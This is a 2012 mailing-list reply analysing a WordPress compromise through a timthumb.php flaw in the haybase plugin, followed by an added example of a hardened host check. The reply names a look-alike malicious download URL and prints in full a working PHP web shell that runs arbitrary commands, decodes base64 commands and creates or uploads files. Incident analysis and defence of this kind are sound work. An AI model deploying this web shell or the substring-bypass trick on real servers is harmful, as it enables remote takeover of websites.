Hi Holger,
On 23-8-2012 18:45, Holger Motzkau wrote:
Hi!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue
Dutch WLM skin. It contains a file called timthumb.php with the
following code:
https://github.com/hay/haybase/blob/master/src/timthumb.php seems to be older than http://timthumb.googlecode.com/svn/trunk/timthumb.php
This code part seems to have been changed:
// external domains that are allowed to be displayed on your website
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
);
[...]
foreach ($allowedSites as $site) {
if (strpos (strtolower ($url_info['host']), $site) !== false) {
$isAllowedSite = true;
}
}
And the check there is stupid. It just checks if an external url contains flickr.com, not if the url is actually flickr.com. Using this, manipulated gif images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images, where they were later executed as php files.
More readable code, in short: you can execute commands on the server.
<?php
@error_reporting(0);
@set_time_limit(0);
$bogel = $_GET['bogel'];
$osc = $_GET['osc'];
if (isset($bogel)) {
eval(
echo "bogel<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo reload-x";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
); die; }
elseif (isset($osc)) {
eval(
$cmd=base64_decode($osc);
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}); }
else { eval(
$content = stripslashes($_POST['content']); $cfile = $_POST['cfile'];
$ufile = $_POST['ufile'];
echo '<br>'.php_uname().'<br>';
echo '<form action="" method="post"
enctype="multipart/form-data"
name="aw" id="aw">';
echo '<textarea name=content
style="width:585px;height:200px">'.$content.'</textarea><br>';
echo '<input type="text" name="cfile" size="10"
value="bogel.php">';
echo '<input name="_create" type="submit" id="_upl"
value="Create">';
echo '<input type="file" name="file"
size="30"><input type="text"
name="ufile" size="10" value="antisux.php">';
echo '<input name="_upload" type="submit" id="_upl"
value="Upload"></form>';
if($_POST['_create']){
$handle = fopen($cfile, 'w');
if($handle){
if (fwrite($handle, $content) === FALSE) { echo "Create $cfile
GAGAL<br>"; }
else { echo "Create $cfile SUKSES !!!<br>"; } fclose($handle);
} else { echo 'Create File GAGAL<br><br>'; }
}
if($_POST['_upload']){
if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "Upload
$ufile SUKSES !!!<br><br>"; }
else { echo "Upload $ufile GAGAL !!!<br><br>"; }
}
); }
?>
It seems only the index.php was replaced and another text file was added.
Is your accesslog still available? You can hunt down the ip's used and what commands were executed.
As we switched to Elyas red skin last weekend I just removed the old WMNL skin and the haybase plugin.
I would suggest everyone still using that plugin should switch to the newer one.
Maarten
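The allowedSites check quoted above accepts any host that merely contains an allowed name. The following is an added example (not timthumb's or haybase's own code) that puts that substring check next to a host match which only accepts the listed domain itself or one of its subdomains; the sample URLs, including the `flickr.com.attacker.example` host, are constructed for the demonstration.

```php
<?php
// Added example: substring allow-list check versus a proper host match.

$allowedSites = array(
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
);

// The check from the quoted plugin code: true whenever an allowed name
// appears anywhere in the host, e.g. in "flickr.com.attacker.example".
function isAllowedSubstring(string $host, array $allowedSites): bool {
    foreach ($allowedSites as $site) {
        if (strpos(strtolower($host), $site) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: the host must equal the allowed name exactly or end in
// ".<name>", so the allowed domain has to be the registrable suffix.
function isAllowedHost(string $host, array $allowedSites): bool {
    $host = strtolower(rtrim($host, '.'));   // drop a trailing dot, normalise case
    foreach ($allowedSites as $site) {
        $site = strtolower($site);
        if ($host === $site) {
            return true;
        }
        $suffix = '.' . $site;
        if (strlen($host) > strlen($suffix)
            && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed sample URLs; the third follows the pattern described in the mail.
$samples = array(
    'http://flickr.com/photo.gif',                    // both checks: allowed
    'http://farm1.static.flickr.com/photo.gif',       // both checks: allowed
    'http://flickr.com.attacker.example/xc0de.php',   // substring: allowed, host: rejected
);
foreach ($samples as $url) {
    $host = (string) parse_url($url, PHP_URL_HOST);
    printf("%-45s substring:%d host:%d\n", $url,
        isAllowedSubstring($host, $allowedSites), isAllowedHost($host, $allowedSites));
}
```

Matching the host correctly is only part of the fix: the fetched file still lands in a web-reachable cache directory, so that directory should also be configured so the web server never executes its contents as PHP.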